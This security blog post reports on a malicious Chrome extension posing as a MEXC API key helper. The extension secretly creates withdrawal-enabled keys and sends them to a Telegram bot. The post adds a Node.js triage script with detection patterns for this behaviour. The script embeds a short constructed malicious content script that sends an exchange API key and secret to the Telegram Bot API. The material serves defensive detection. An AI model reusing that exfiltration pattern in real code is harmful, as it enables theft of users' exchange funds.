Malicious Chrome Extension Steals Wallet Login Credentials

  • Jan 13
  • 2 min read

Key Findings


  • Researchers have discovered a malicious Google Chrome extension named "MEXC API Automator" that steals API keys from users of the MEXC cryptocurrency exchange.

  • The extension masquerades as a tool that simplifies managing MEXC API keys for automated trading.

  • In reality, it programmatically creates new API keys on the victim's account, enables the withdrawal permission on them, hides that permission from the victim in the exchange's web UI, and exfiltrates the key and secret to a Telegram bot controlled by the threat actor.

  • A withdrawal-enabled key gives the attackers full API control over the victim's MEXC account: they can execute trades, perform automated withdrawals, and drain the balance.

  • Because the extension runs inside the victim's already authenticated browser session, the keys are created under the victim's own login; the attacker never needs the victim's password or 2FA codes, which is what makes the attack particularly dangerous.

  • The extension's code contains inline comments written in Russian, suggesting the threat actor is likely a Russian speaker.

  • The extension is linked to a broader cluster of crypto-focused threats sharing the "SwapSushi" brand, which also appears on Telegram bots and YouTube channels tied to the same actor.


Background


The MEXC API Automator extension was published on the Chrome Web Store on September 1, 2025, under the developer name "jorjortan142". It promised to simplify the complex process of managing API keys for high-frequency trading on the MEXC cryptocurrency exchange.


Malicious Functionality


  • Once the victim visits MEXC with the extension installed, it programmatically creates new API keys on the account, enables the withdrawal permission on them, and hides that permission in the exchange's web user interface (UI), so a victim reviewing their keys sees nothing unusual.

  • It then exfiltrates the API key and secret to a hardcoded Telegram bot controlled by the threat actor, using Telegram's Bot API as the exfiltration channel.

  • A withdrawal-enabled key gives the attackers full API control over the victim's MEXC account: they can execute trades, perform automated withdrawals, and drain the balance without ever logging in themselves.

  • The attack is particularly dangerous because it rides on an already authenticated browser session: the key-creation requests carry the victim's own session cookies, so the attacker never needs the victim's password or 2FA codes, and no login from an unfamiliar device ever takes place.

  • Anyone who installed the extension should remove it, revoke every API key on the affected MEXC account rather than only the ones they recognise, and check the account's history for unexpected withdrawals.
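As an added example (not part of the original post, and not the extension's own code), the following Node.js script triages an unpacked Chrome extension for exactly the behaviours listed above: a hardcoded Telegram Bot API call, a withdrawal flag being set, API key and secret handling, DOM hiding, requests that reuse the victim's session cookies, Cyrillic comments, and any network endpoint outside the hosts the manifest declares. It runs against a constructed manifest and two constructed content scripts; the exchange endpoint path, the bot token and the listing name are placeholders, not the real MEXC or actor infrastructure, and the Russian comment in the malicious sample ("create a new key and enable withdrawal") is there only to exercise the Cyrillic-comment indicator.

```javascript
// Added example, not code from the original post or from the extension itself:
// a static triage pass over an unpacked Chrome extension that flags the
// behaviours described above. Manifest, scripts, endpoint path and bot token
// below are constructed placeholders, not the real MEXC or actor infrastructure.

const INDICATORS = [
  { id: 'telegram-bot-exfil', weight: 5, note: 'hardcoded Telegram Bot API call (exfiltration channel)',
    pattern: /https:\/\/api\.telegram\.org\/bot[^/'"\s]+\/send/i },
  { id: 'withdraw-permission', weight: 3, note: 'sets a withdrawal permission flag to true',
    pattern: /withdraw\w*\s*[:=]\s*true/i },
  { id: 'api-key-harvest', weight: 2, note: 'handles API key / secret material',
    pattern: /\b(apiKey|api_key|secretKey|secret_key|accessKey)\b/ },
  { id: 'ui-hiding', weight: 2, note: 'hides or removes a DOM element (permission concealment)',
    pattern: /style\.display\s*=\s*['"]none['"]|\.hidden\s*=\s*true|\.remove\(\)/ },
  { id: 'session-credentials', weight: 1, note: "sends requests with the victim's session cookies",
    pattern: /credentials\s*:\s*['"]include['"]/ },
  { id: 'cyrillic-comment', weight: 1, note: 'Cyrillic text in a comment (attribution hint only)',
    pattern: /(\/\/|\/\*)[^\n]*[\u0400-\u04FF]/ },
];

// Turn a Chrome match pattern such as "https://*.mexc.com/*" into a hostname test.
function hostMatcher(matchPattern) {
  if (matchPattern === '<all_urls>') return () => true;
  const m = /^(\*|https?|wss?|ftp):\/\/([^/]+)\//.exec(matchPattern);
  if (!m) return () => false;
  const host = m[2];
  if (host === '*') return () => true;
  if (host.startsWith('*.')) return h => h === host.slice(2) || h.endsWith(host.slice(1));
  return h => h === host;
}

// Host patterns the manifest declares: host_permissions, URL-style entries in
// permissions (MV2 style) and content-script match lists.
function declaredHostPatterns(manifest) {
  const scripts = (manifest.content_scripts || []).flatMap(cs => cs.matches || []);
  const urlPerms = (manifest.permissions || []).filter(p => p.includes('://') || p === '<all_urls>');
  return [...(manifest.host_permissions || []), ...urlPerms, ...scripts];
}

// Line-by-line indicator scan of one script; also collects absolute URLs it contains.
function scanScript(name, source) {
  const findings = [], urls = [];
  source.split('\n').forEach((line, idx) => {
    for (const ind of INDICATORS) {
      if (ind.pattern.test(line)) findings.push({ file: name, line: idx + 1, id: ind.id, note: ind.note, snippet: line.trim() });
    }
    for (const u of line.match(/https?:\/\/[A-Za-z0-9.-]+[^\s'"`)]*/g) || []) urls.push(u);
  });
  return { findings, urls };
}

// Triage an unpacked extension: manifest object plus { filename: source }.
// Each indicator counts once toward the score however often it fires.
function triageExtension(manifest, scripts) {
  const declaredHosts = declaredHostPatterns(manifest);
  const matchers = declaredHosts.map(hostMatcher);
  const findings = [], externalEndpoints = [];
  for (const [name, source] of Object.entries(scripts)) {
    const r = scanScript(name, source);
    findings.push(...r.findings);
    for (const u of r.urls) {
      let host;
      try { host = new URL(u).hostname; } catch (e) { continue; }
      // Traffic to a host the manifest never declares deserves a second look.
      if (!matchers.some(ok => ok(host)) && !externalEndpoints.includes(u)) externalEndpoints.push(u);
    }
  }
  const hit = new Set(findings.map(f => f.id));
  const score = INDICATORS.filter(i => hit.has(i.id)).reduce((s, i) => s + i.weight, 0);
  const verdict = score >= 8 ? 'high' : score >= 4 ? 'medium' : 'low';
  return { declaredHosts, indicators: [...hit].sort(), externalEndpoints, findings, score, verdict };
}

// Constructed samples: a manifest plus one malicious and one benign content script.
const SAMPLE_MANIFEST = {
  manifest_version: 3, name: 'Example Exchange API Helper', permissions: ['storage'],
  host_permissions: ['https://*.mexc.com/*'],
  content_scripts: [{ matches: ['https://www.mexc.com/*'], js: ['content.js'] }],
};
const MALICIOUS_SCRIPT = `// Создаём новый ключ и включаем вывод
async function createKey() {
  const r = await fetch('/api/example/apikey/create', {   // placeholder path
    method: 'POST', credentials: 'include',
    body: JSON.stringify({ name: 'bot', withdraw: true }),
  });
  const { apiKey, secretKey } = await r.json();
  document.querySelector('.perm-withdraw').style.display = 'none';
  await fetch('https://api.telegram.org/bot123456:EXAMPLE/sendMessage', {
    method: 'POST', body: JSON.stringify({ chat_id: 1, text: apiKey + ':' + secretKey }),
  });
}`;
const BENIGN_SCRIPT = `// Shows the current trading pair in a badge
chrome.storage.local.set({ lastPair: document.title.split(' ')[0] });`;

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, { 'content.js': MALICIOUS_SCRIPT }), null, 2));
```

Run it with `node triage.js`; the malicious sample scores 14 ("high") with the Telegram endpoint listed as traffic to an undeclared host, while the benign sample scores 0. The weights and thresholds are illustrative, and regexes are defeated by even light obfuscation, so treat this as a first pass that tells you where to read, not as a verdict: the point is to look for the combination of key creation, a withdrawal flag, UI tampering and an out-of-band exfiltration channel, which is the pattern this extension exhibits.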


Technical Analysis


  • Analysis of the extension's code revealed numerous inline comments written in Russian, suggesting the threat actor is likely a Russian speaker.

  • The extension is also linked to the "SwapSushi" brand, which appears across Telegram bots and YouTube channels associated with the same actor.

  • On this evidence the researchers assess with moderate confidence that the extension belongs to a broader cluster of crypto-focused threats operated by the same actor.


Conclusion


The MEXC API Automator extension is an account-draining trap that targets MEXC exchange users under the guise of a trading automation tool. By hijacking the API key management workflow inside the victim's own logged-in session, the attackers obtain a withdrawal-enabled API key without ever facing the account's password or 2FA, and with it full control over the victim's funds. The Russian language artifacts and the connections to the "SwapSushi" brand suggest the threat actor behind this malware is likely a Russian speaker.


Sources


  • https://securityonline.info/malicious-chrome-extension-drains-crypto-via-secret-api-keys/

  • https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html

  • https://barid.tv/2026/01/13/crypto-heist-in-your-browser-malicious-chrome-extension-steals-mexc-api-keys/

  • https://www.abit.ee/en/cybersecurity/mexc-api-automator-malicious-chrome-extension-cryptocurrency-theft-api-keys-mexc-exchange-cyber-thre-en

  • https://cybersecuritynews.com/malicious-chrome-extension-steals-wallet-login-credentials/

© 2025 by Explain IT Again. Powered and secured by Wix